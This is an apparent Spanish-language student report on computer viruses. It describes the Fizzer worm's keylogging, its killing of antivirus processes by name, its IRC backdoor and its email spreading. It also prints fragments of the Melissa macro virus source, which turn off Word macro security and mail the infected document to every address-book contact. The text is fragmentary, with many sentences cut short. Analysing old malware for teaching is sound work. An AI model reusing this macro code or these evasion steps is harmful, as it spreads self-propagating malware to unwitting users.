Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Virologia I Eje 2 PDF
Virologia I Eje 2 PDF
DOCENTE
INTEGRANTES
Jorge Leonardo Gonzalez Moscoso-041
Juan Pablo Beltran-041
INTRODUCCIÓN
● Captura las pulsaciones de teclado que realiza el usuario. Fizzer guarda estas
fichero, tendrá acceso a datos confidenciales del usuario del ordenador afectado,
como pueden ser claves de acceso a servicios de Internet, cuentas bancarias, etc.
● Está preparado para finalizar procesos activos. Con ello, algunos programas dejarían
ello, busca y finaliza los procesos activos entre cuyo nombre se encuentre alguna de
NAV, SCAN, AVP, TASKM, VIRUS, F-PROT, VSHW, ANTIV, VSS, NMAIN.
Método de Infección
funcionamiento.
Además, Fizzer crea otra copia en el directorio de ficheros temporales de Windows, con
el nombre ISERVC.EXE.
Con esta clave, Fizzer consigue ejecutarse cada vez que se inicie el sistema.
Con esta clave, el gusano consigue ejecutarse cada vez que el usuario abra un fichero
de texto.
Para actuar como un troyano de tipo backdoor, Fizzer sigue el siguiente proceso:
● Se conecta a unos determinados servidores de IRC. Si quiere ver una lista de los
● Cuando esta conexión se produce, el cliente de acceso remoto consigue acceso a los
Método de Propagación
Cuando infecta un ordenador, utiliza su propio motor SMTP para enviar por correo
netzero.com.
Otros Detalles
Para que conozca un poco mejor a Fizzer, aquí le presentamos alguna de sus
características:
Fizzer posee la capacidad de actualizarse bajando parches de una página web hospedada
en Geocities.
Es un virus de tipo Gusano que se propaga facil y velozmente por correo electrónico y la
red . fue detectado el 26 de enero del 2004 y a pocas horas se reportaron miles de
usuarios infectados.
El mensaje suele pesar entre 30 35 KB, siempre con remitente falso,son los adjuntos
utiliza las siguientes extensiones
.bat
.cmd
.exe
.pif
Cuando se ejecuta , abre el bloc de notas y muestra caracteres sin sentido, realiza ataques
de denegación del servicio, el gusano abre una puerta trasera por el puerto TCP/3176.
\TEMP\Message
c:\windows\system\shimgapi.dll
c:\windows\system\taskmon.exe
● Future Time
● Panda Software
cuál detendrá y advertirá de cualquier virus de este tipo y troyanos, deshabilitar las
Parte II
p$ = "clone"
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
VIROLOGIA 8
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
End If
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo"
Then
For y = 1 To DasMapiName.AddressLists.Count
x=1
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x=x+1
VIROLOGIA 9
Next oo
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
Kwyjibo"
End If
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
ADI1.CodeModule.DeleteLines 1, ADCL
ADI1.Name = "Melissa"
DoAD = True
End If
NTI1.CodeModule.DeleteLines 1, NTCL
1. ¿Nombre de Virus?
Melissa
Un gusano
Cada una de esas personas recibía un mensaje con el asunto: «Important message
from» (Mensaje importante de...) y el nombre del archivo infectado. El cuerpo
del mensaje consistía en el texto «Here is that document you asked for... don't
show anyone else ;-)» (Aquí está el documento que pediste... no se lo enseñes a
nadie más) . A continuación adjuntaba el documento Word activo y envía el
mensaje.
Mediante dicho mensaje el autor pretendía hacer creer que el archivo adjunto era de
total confianza. Esta técnica de ingeniería social había sido empleada por muchos
virus. El usuario que recibía el documento o archivo lo habría tranquilamente y se
infectaba.
CONCLUSIONES
La funcionalidad de los virus ha cambiado con el pasar del tiempo y los intereses de sus
creadores , por esto es de vital importancia estar capacitados en cómo reaccionar ante
cualquier tipo de ataque, sin embargo no olvidar y tener en cuenta lo más básico que es
tener nuestro antivirus actualizados , revisar con cuidado que correos y sitios por los que
Hoy en día los virus nos ha mostrado que se deben combatir dia a dia, con el solo hecho
de manejar un dispositivo ya se está expuesto a estos ataques con internet o sin internet,
ya que los hackers lo que buscan es poder activar el virus de cualquier forma para poder
llegar a su objetivo.
VIROLOGIA 12
BIBLIOGRAFÍA
Autor: Panda
Url: https://www.pandasecurity.com/es/security-info/39588/information/Fizzer
Autor: Glosariolt.com
Url: https://www.glosarioit.com/virus/Melissa.html
Autor: Vsantivirus
http://www.vsantivirus.com/mydoom-a.htm
Autor: f-secure.com
https://www.f-secure.com/v-descs/novarg.shtml